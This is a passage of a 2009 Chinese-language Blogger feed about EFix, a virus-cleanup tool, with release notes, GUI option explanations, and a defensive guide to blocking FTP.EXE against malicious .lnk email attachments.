href='http://reinfors.blogspot.com/2009/12/blog-post.html' title='增加一個下載連結'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4312316655057556616</id><published>2009-11-27T09:11:00.005+08:00</published><updated>2009-11-27T09:26:55.458+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>新修改的其他選項</title><content type='html'>這一次作的修改最主要是將SCRIPT GUI的其他選項部分做了一個修改&lt;br /&gt;&lt;br /&gt;其他選項其中裡面還原磁碟帶隱藏屬性的檔案是以選取磁碟來做一個無差別處理&lt;br /&gt;如下圖：&lt;BR&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_XPrN8EVFxI4/SwFmUiUKHQI/AAAAAAAAAXc/XUTZbMeRb_0/s1600/m_pic.jpg"&gt;&lt;img style="cursor: pointer; width: 650px; height: 493px;" src="http://4.bp.blogspot.com/_XPrN8EVFxI4/SwFmUiUKHQI/AAAAAAAAAXc/XUTZbMeRb_0/s1600/m_pic.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;這樣在之前一直都碰到有人就直接也無差別全選之後就直接跑了..&lt;br /&gt;後來看到系統裡面突然多出來一堆原本應該是本來就隱藏起來也不能刪除或移動他的資料夾或檔案&lt;br /&gt;然後心慌去刪除他，之後系統就掛了...然後怪EFix&lt;br /&gt;&lt;br /&gt;所以這邊將選項做了一個修改&lt;br /&gt;修改成直接顯示被隱藏的檔案，要還原的話只還原有勾選的項次&lt;br /&gt;如下圖：&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sylovanas.myweb.hinet.net/Temp/gui01.jpg"&gt;&lt;img style="cursor: pointer; width: 649px; height: 490px;" src="http://sylovanas.myweb.hinet.net/Temp/gui01.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;上面的圖注意我文字打錯了，不是檔案是資料夾&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;下方的選項修改成包含子資料夾和顯示被隱藏的檔案&lt;br /&gt;包含子資料夾的用處是一樣的，目的在將選取的資料夾內的所有帶有含隱藏屬性的資料夾全部去除掉所有屬性變成一般屬性&lt;br /&gt;一般一樣建議除非是真的全部都被隱藏，不然別用&lt;br /&gt;而另一個選項是新增加的顯示被隱藏的檔案&lt;br /&gt;&lt;br /&gt;如下圖：&lt;br /&gt;&lt;BR&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sylovanas.myweb.hinet.net/Temp/gui02.jpg"&gt;&lt;img style="cursor: pointer; width: 650px; height: 490px;" src="http://sylovanas.myweb.hinet.net/Temp/gui02.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;在勾選之後會將系統裡面帶隱藏屬性的檔案顯示出來&lt;br /&gt;同樣勾選之後繼續執行就可以將該檔案屬性還原&lt;br /&gt;&lt;br /&gt;這樣的使用方式我想應該能夠比較減少一些問題出現&lt;br /&gt;&lt;br /&gt;不過這邊要注意一點，就是該顯示隱藏檔案資料只限於根目錄&lt;br /&gt;也就是C:\,D:\,E:\ 這樣子底下的資料夾&lt;br /&gt;並不會顯示所有資料夾內的資料夾&lt;br /&gt;這點還請多注意一下。&lt;br /&gt;&lt;br /&gt;其他就沒甚麼太大變動.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4312316655057556616?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4312316655057556616'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4312316655057556616'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/11/blog-post_27.html' title='新修改的其他選項'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_XPrN8EVFxI4/SwFmUiUKHQI/AAAAAAAAAXc/XUTZbMeRb_0/s72-c/m_pic.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-2359188174220159623</id><published>2009-11-26T20:05:00.002+08:00</published><updated>2009-11-26T20:12:27.010+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.3 20091126.30</title><content type='html'>版本：20091126.30&lt;br /&gt;&lt;br /&gt;檔案資訊:&lt;br /&gt;File size: 1114053 bytes&lt;br /&gt;MD5...: 47fa82b6af2637498dee6b9880054dff&lt;br /&gt;SHA1..: 2ce9b98e77d15985357d689671ba303def8af736&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 RC1&lt;br /&gt;Windows XP SP2 SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;SCRIPT GUI更新到1.8&lt;br /&gt;GUI的還原各磁碟帶隱藏屬性的資料夾做修改&lt;br /&gt;以前只有選擇磁碟代號，現在會直接將隱藏檔案顯示出來&lt;br /&gt;GUI的讀我資訊從原本的呼叫記事本修改成直接顯示&lt;br /&gt;GUI的官網修改成連至比較需要用到的地方&lt;br /&gt;&lt;br /&gt;新增刪除檔案&lt;br /&gt;&lt;br /&gt;後記：請小心變種的台灣製資料夾型病毒&lt;br /&gt;越來越沒良心了那東西...&lt;br /&gt;如果硬刪除該病毒主檔的話會有機會造成該病毒直接摧毀系統&lt;br /&gt;由於該病毒似乎志在刷某網站的流量&lt;br /&gt;所以在某一個程度到達之後他一樣會直接摧毀系統&lt;br /&gt;請各位務必多加注意.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-2359188174220159623?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2359188174220159623'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2359188174220159623'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/11/efix-ver-53-2009112630.html' title='EFix Ver 5.3 20091126.30'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4901330019334715330</id><published>2009-11-16T23:20:00.002+08:00</published><updated>2009-11-16T23:27:09.057+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>小紅傘 中文化 beta版測試活動</title><content type='html'>小紅傘是在台灣還算不少人使用並且滿意度還算高的防毒軟體&lt;br /&gt;近期代理商 (是吧=.=a) 作了中文化的工作，並釋出測試版讓人測試.&lt;br /&gt;有興趣參加活動的請至下列網址觀看，不過就目前情形來說我看大概差不多快滿了吧...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://g-ray.com.tw/forum/index.php?topic=89.15"&gt;http://g-ray.com.tw/forum/index.php?topic=89.15&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;有中文化算好事囉，多一個選擇總是不錯的&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;------------------------------------------------&lt;br /&gt;至於我用哪一套？&lt;br /&gt;就目前來說我沒裝，不管是公司或者是家裡.&lt;br /&gt;好孩子不要學XD&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4901330019334715330?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4901330019334715330'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4901330019334715330'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/11/beta.html' title='小紅傘 中文化 beta版測試活動'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-3004642441012916080</id><published>2009-11-16T22:35:00.007+08:00</published><updated>2009-11-16T23:01:17.365+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='系統'/><title type='text'>其他選項不了解的話就不要用免的問題會更多</title><content type='html'>因為碰到好多了...&lt;br /&gt;&lt;br /&gt;雖然說大致上還不至於影響系統運作&lt;br /&gt;但是將屬性打亂掉或多或少也是會造成一些問題存在&lt;br /&gt;&lt;br /&gt;在SCRIPT GUI視窗裡面的其他選項中，其中有一個大項次叫做&lt;span style="font-weight: bold;"&gt;還原下列選取磁碟代號內被隱藏的資料夾&lt;/span&gt;的&lt;br /&gt;如下圖：&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_XPrN8EVFxI4/SwFmUiUKHQI/AAAAAAAAAXc/XUTZbMeRb_0/s1600/m_pic.jpg"&gt;&lt;img style="cursor: pointer; width: 400px; height: 303px;" src="http://4.bp.blogspot.com/_XPrN8EVFxI4/SwFmUiUKHQI/AAAAAAAAAXc/XUTZbMeRb_0/s400/m_pic.jpg" alt="" id="BLOGGER_PHOTO_ID_5404713530816077058" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;這一個選項用途是用來應付偽裝成資料夾引誘你點擊的病毒&lt;br /&gt;&lt;br /&gt;從今年年初開始有另一種不是利用自動執行功能的隨身碟病毒開始在散佈&lt;br /&gt;就目前來說大陸地區已經是取代隨身碟AUTORUN.INF成為主要的隨身碟病毒&lt;br /&gt;&lt;br /&gt;他的做法是將原本在&lt;span style="color: rgb(255, 0, 0);"&gt;隨身碟內的資料夾隱藏起來&lt;/span&gt;&lt;br /&gt;在將病毒自己本身改名為資料夾的名稱，並將自己的圖示修改成資料夾圖示&lt;br /&gt;也因此不知情的使用者在點擊了該資料夾圖示時，就會讓自己的電腦中毒&lt;br /&gt;&lt;br /&gt;然而刪毒簡單，但回復被病毒隱藏起來的資料夾在一些使用者來說算是蠻困難的&lt;br /&gt;所以這邊做了一個選項讓那些被隱藏的資料夾能夠方便還原&lt;br /&gt;但要注意，這一個選項本身並不會去幫你篩選哪一些是該隱藏的哪一些是該顯示的&lt;br /&gt;只要是有帶隱藏屬性的資料夾一律讓他顯示，除非在白名單之內的&lt;br /&gt;&lt;br /&gt;要硬是讓他們顯示的話，可能會有若干性的系統問題&lt;br /&gt;而且這一點是不可逆的，所以除非是真的有碰到資料夾屬性都被隱藏&lt;br /&gt;否則這一個選項請不要去動他，尤其是包含子資料夾.&lt;br /&gt;&lt;br /&gt;我改天似乎該做一個說明書才是...&lt;br /&gt;不然看到啥選項就勾的人也不少，鐵定會造成一堆問題...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-3004642441012916080?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3004642441012916080'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3004642441012916080'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/11/blog-post.html' title='其他選項不了解的話就不要用免的問題會更多'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_XPrN8EVFxI4/SwFmUiUKHQI/AAAAAAAAAXc/XUTZbMeRb_0/s72-c/m_pic.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-3847140341182286723</id><published>2009-11-16T12:10:00.003+08:00</published><updated>2009-11-16T12:18:38.254+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.3 20091116.27</title><content type='html'>版本：20091116.27&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 1113053 bytes&lt;br /&gt;MD5...: 60c8e3f524665a747557c104aeb06cd5&lt;br /&gt;SHA1..: a25bfd9802dd23c8a5ec8db071493812a2ddd651&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 RC1&lt;br /&gt;&lt;br /&gt;修改事項&lt;br /&gt;SCRIPT GUI介面更新到1.7版，其他設定選項和自訂腳本全部都改成用分頁作切換.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;備註：對一個完全沒接觸過HTML語法的人這個GUI還真是難弄...&lt;br /&gt;後來研究了一個多月後終於在VBS上搞成功了...結果也只是短短幾行而已0rz&lt;br /&gt;這邊感謝&lt;a href="http://audi.tw/Blog/webDesign/tab.design.1.asp"&gt;【卜維丰】HTML / CSS / JavaScript&lt;/a&gt; BLOG頁面上的分頁切換架構範例.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-3847140341182286723?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3847140341182286723'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3847140341182286723'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/11/efix-53-2009111627.html' title='EFix 5.3 20091116.27'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5179786655704217068</id><published>2009-11-10T10:35:00.003+08:00</published><updated>2009-11-10T10:44:26.471+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.3 20091110.26</title><content type='html'>版本：20091110.26&lt;br /&gt;&lt;br /&gt;檔案資訊 (exe檔)：&lt;br /&gt;File size: 1113732 bytes&lt;br /&gt;MD5...: 986feda7b0a58b56827d6d82a18f7c32&lt;br /&gt;SHA1..: d63768dc06582850ff20694a75588488d0d12cb8&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 RC1&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;SCRIPT GUI介面作一點修改&lt;br /&gt;增加延伸系統分析，位置放在自訂腳本裡面，主要增加掃描新增移除程式和Windows錯誤事件報告以及連至Windows UPDATE檢查有哪些更新沒有更新.&lt;br /&gt;增加一點刪除檔案.&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;HINET空間最近又不太穩定，可以的話就從網頁這邊的免費空間下載吧&lt;br /&gt;自動更新可能會出點狀況.&lt;br /&gt;另外Win7 x64鐵定是不支援的,現在不會以後也不會.除非這一整個架構整個重作,不過那是不可能的事..&lt;br /&gt;因為裡面包的工具也大多都不支援，連工具本身都不支援了怎麼可能會讓只是讓那些工具自動化工作的腳本支援...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5179786655704217068?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5179786655704217068'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5179786655704217068'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/11/efix-53-2009111026.html' title='EFix 5.3 20091110.26'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6232066586125142971</id><published>2009-10-23T16:48:00.004+08:00</published><updated>2009-10-24T09:26:49.942+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.3 20091023.22</title><content type='html'>&lt;p&gt;版本：5.3 20091023.22&lt;/p&gt;&lt;p&gt;檔案資訊 (EXE檔本身的資訊)：&lt;/p&gt;&lt;p&gt;File size: 1122344 bytes&lt;br /&gt;MD5...: 3e1394f25b35268927f85f454ef7f09e&lt;br /&gt;SHA1..: 3edb705fe9ef1634e4995580ae66b6978cf4fd1f&lt;br /&gt;&lt;/p&gt;&lt;p&gt;測試過的作業系統：&lt;/p&gt;&lt;p&gt;Windows 7 RC1&lt;/p&gt;&lt;p&gt;Windows XP SP2&lt;/p&gt;&lt;p&gt;修改事項：&lt;/p&gt;&lt;p&gt;增加刪除檔案 (softqq0.dll - softqq9.dll , bnmkue0.dll , bnmkue1.dll - bnmkue9.dll , aqoeerw.exe)&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;註1：&lt;/p&gt;&lt;p&gt;這兩個因為同一天看到兩例以上的人有中，有用其他軟體增加免疫資料夾的全部會偵測不到，沒有用免疫資料夾的舊版本皆可處理，但因為還是有必要要加所以先緊急加上去了&lt;/p&gt;&lt;p&gt;註2：&lt;/p&gt;&lt;p&gt;咪的哩我還在忙耶逼我一定要修改冏+&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6232066586125142971?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6232066586125142971'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6232066586125142971'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/10/efix-ver-53-2009102322.html' title='EFix Ver 5.3 20091023.22'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4739168471803821120</id><published>2009-10-22T13:01:00.011+08:00</published><updated>2009-10-22T13:48:38.042+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><category scheme='http://www.blogger.com/atom/ns#' term='系統'/><title type='text'>近期Yahoo Mail信箱的病毒一些防治方式</title><content type='html'>Yahoo Mail 基本上來說在很多人心中是大毒窟&lt;br /&gt;有人每天都可以收到一大堆帶病毒信件的郵件&lt;br /&gt;&lt;br /&gt;然後這些病毒信件在每一家防毒來說基本上是抓不到的&lt;br /&gt;為何抓不到？&lt;br /&gt;因為那些檔案本來就是正常的檔案...&lt;br /&gt;&lt;br /&gt;該病毒郵件使用的原理大至如下:&lt;br /&gt;&lt;br /&gt;寄出郵件，檔案大約1.多k&lt;br /&gt;使用者收到病毒郵件可以看到有夾帶約1.多k左右的&lt;span style="color: rgb(255, 0, 0);"&gt;lnk&lt;/span&gt;檔&lt;br /&gt;像是&lt;br /&gt;可愛的愛心大頭照.lnk&lt;br /&gt;交易明細.lnk&lt;br /&gt;&lt;br /&gt;這一類後面可以看到很明顯的副檔名叫作lnk&lt;br /&gt;&lt;br /&gt;而這一類的檔案在執行後&lt;br /&gt;他會依照他的腳本進行動作&lt;br /&gt;&lt;br /&gt;腳本內容就不貼了，這邊貼主要的動作&lt;br /&gt;&lt;br /&gt;他會使用到系統裡面的FTP.EXE (內建的Windows指令，用處為使用FTP傳輸協定連線到伺服器上下傳東西)&lt;br /&gt;連線到該惡意伺服器下載惡意程式並執行&lt;br /&gt;&lt;br /&gt;當下載的惡意程式執行後該lnk檔就不再有任何動作&lt;br /&gt;很單純的就只是一個自動化腳本，利用電腦內建的指令去作自動化動作&lt;br /&gt;也因為都是使用Windows內建的指令，所以在防毒廠商和防毒軟體來說&lt;br /&gt;那東西並不算是病毒 (實際也不是)&lt;br /&gt;&lt;br /&gt;也因此在預防上面可以針對FTP.EXE這東西下手&lt;br /&gt;&lt;br /&gt;FTP.EXE前面提到是Windows內建指令，功用為使用FTP通訊協定和伺服器進行連線&lt;br /&gt;而FTP.EXE這東西一般人沒有人在使用，所以我們可以將他的檔案權限鎖住讓他無法執行。&lt;br /&gt;&lt;br /&gt;使用方式基本上如下：&lt;br /&gt;&lt;br /&gt;首先開啟我的電腦&lt;br /&gt;按工作列的工具 -&gt; 資料夾選項 -&gt; 檢視&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_XPrN8EVFxI4/St_tvf-zZ_I/AAAAAAAAAWE/7L26gqDb-zc/s1600-h/lnk1.JPG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 102px;" src="http://2.bp.blogspot.com/_XPrN8EVFxI4/St_tvf-zZ_I/AAAAAAAAAWE/7L26gqDb-zc/s320/lnk1.JPG" alt="" id="BLOGGER_PHOTO_ID_5395292278907693042" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;尋找 "&lt;span style="color: rgb(0, 0, 153);"&gt;使用簡易檔案共用(建議)&lt;/span&gt;" 這一項將他&lt;span style="color: rgb(255, 0, 0);"&gt;取消打勾&lt;/span&gt;.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_XPrN8EVFxI4/St_uCRRPkpI/AAAAAAAAAWM/g5k5A96urhw/s1600-h/lnk2.JPG"&gt;&lt;img style="cursor: pointer; width: 287px; height: 320px;" src="http://2.bp.blogspot.com/_XPrN8EVFxI4/St_uCRRPkpI/AAAAAAAAAWM/g5k5A96urhw/s320/lnk2.JPG" alt="" id="BLOGGER_PHOTO_ID_5395292601376019090" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;如果是已經取消的就不管他&lt;br /&gt;&lt;br /&gt;之後開啟到windows\system32資料夾,尋找FTP.EXE這一個檔案&lt;br /&gt;在該檔案按滑鼠右鍵選擇內容&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_XPrN8EVFxI4/St_uRKEtqUI/AAAAAAAAAWU/CtGF38Au4Ok/s1600-h/lnk3.JPG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 231px;" src="http://3.bp.blogspot.com/_XPrN8EVFxI4/St_uRKEtqUI/AAAAAAAAAWU/CtGF38Au4Ok/s320/lnk3.JPG" alt="" id="BLOGGER_PHOTO_ID_5395292857142454594" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;之後跳出來的視窗選擇安全性&lt;br /&gt;並尋找名稱那一欄為Everyone的選項選取反白，選取反白後在下方欄位拒絕處全勾.&lt;br /&gt;勾選完後按下確定即可.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_XPrN8EVFxI4/St_u0Py3QzI/AAAAAAAAAWk/MbF68civxRE/s1600-h/lnk5.JPG"&gt;&lt;img style="cursor: pointer; width: 258px; height: 320px;" src="http://1.bp.blogspot.com/_XPrN8EVFxI4/St_u0Py3QzI/AAAAAAAAAWk/MbF68civxRE/s320/lnk5.JPG" alt="" id="BLOGGER_PHOTO_ID_5395293459973620530" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;如果您之前有將&lt;br /&gt;"&lt;span style="color: rgb(0, 0, 153);"&gt;使用簡易檔案共用(建議)&lt;/span&gt;"&lt;br /&gt;這一項取消打勾的話建議您再將他打勾回去&lt;br /&gt;&lt;br /&gt;如果假設沒有Everyone這一個使用者呢？&lt;br /&gt;那就要新增&lt;br /&gt;&lt;br /&gt;首先按下群組或使用者名稱下方的新增按鈕&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_XPrN8EVFxI4/St_vUxQJTdI/AAAAAAAAAWs/lq_Zp_V02uI/s1600-h/lnknew1.JPG"&gt;&lt;img style="cursor: pointer; width: 263px; height: 320px;" src="http://2.bp.blogspot.com/_XPrN8EVFxI4/St_vUxQJTdI/AAAAAAAAAWs/lq_Zp_V02uI/s320/lnknew1.JPG" alt="" id="BLOGGER_PHOTO_ID_5395294018710621650" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;按下之後再跳出的視窗選擇進階&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_XPrN8EVFxI4/St_vk5JyKYI/AAAAAAAAAW0/2COEeMTcddA/s1600-h/lnknew2.JPG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 170px;" src="http://3.bp.blogspot.com/_XPrN8EVFxI4/St_vk5JyKYI/AAAAAAAAAW0/2COEeMTcddA/s320/lnknew2.JPG" alt="" id="BLOGGER_PHOTO_ID_5395294295709329794" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;跳出的新視窗在按下立即尋找&lt;br /&gt;等跑完後在最下方視窗處尋找Everyone選取他讓他反白並按下確定.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_XPrN8EVFxI4/St_vzylTRxI/AAAAAAAAAW8/9FD9bNP67kM/s1600-h/lnknew3.JPG"&gt;&lt;img style="cursor: pointer; width: 284px; height: 320px;" src="http://4.bp.blogspot.com/_XPrN8EVFxI4/St_vzylTRxI/AAAAAAAAAW8/9FD9bNP67kM/s320/lnknew3.JPG" alt="" id="BLOGGER_PHOTO_ID_5395294551643735826" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;之後會回到上一層視窗，檢查在輸入物件或名稱來選取這一欄看有沒有Everyone的存在&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_XPrN8EVFxI4/St_wQN76r8I/AAAAAAAAAXE/iDKFash--TE/s1600-h/lnknew4.JPG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 171px;" src="http://4.bp.blogspot.com/_XPrN8EVFxI4/St_wQN76r8I/AAAAAAAAAXE/iDKFash--TE/s320/lnknew4.JPG" alt="" id="BLOGGER_PHOTO_ID_5395295040022687682" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;有就按確定，按完之後就會出現Everyone的名稱了.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;當處理完畢之後，就可以發現FTP.EXE已經無法使用.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_XPrN8EVFxI4/St_w53SP80I/AAAAAAAAAXM/to1AmPyOW3s/s1600-h/FTP.JPG"&gt;&lt;img style="cursor: pointer; width: 320px; height: 206px;" src="http://4.bp.blogspot.com/_XPrN8EVFxI4/St_w53SP80I/AAAAAAAAAXM/to1AmPyOW3s/s320/FTP.JPG" alt="" id="BLOGGER_PHOTO_ID_5395295755496846146" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;這樣也因為病毒無法使用FTP.EXE下載病毒，進而讓該下載器無法動作&lt;br /&gt;就可達到防止自動下載真正病毒執行的效果.&lt;br /&gt;&lt;br /&gt;然而使用上有一些限制，如果有符合以下限制的人要不然就是換方法&lt;br /&gt;要不然就多留意一些不要執行到了&lt;br /&gt;&lt;br /&gt;1.系統磁碟檔案格式為FAT32&lt;br /&gt;2.有需要使用到FTP.EXE這一個內建指令連線伺服器的人 (不是檔FTP傳輸協定，只是單純檔FTP.EXE這個檔案執行而已，只檔這檔案並不影響FTP使用)&lt;br /&gt;&lt;br /&gt;基本上最根本的方式就是多注意信件&lt;br /&gt;不要看到就開啟就能減少很多問題了..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;至於FAT32因為沒有安全性這東西那要怎麼作才行？&lt;br /&gt;基本上會建議使用安全性原則或者是IFEO去阻檔,這個以後在說...&lt;div 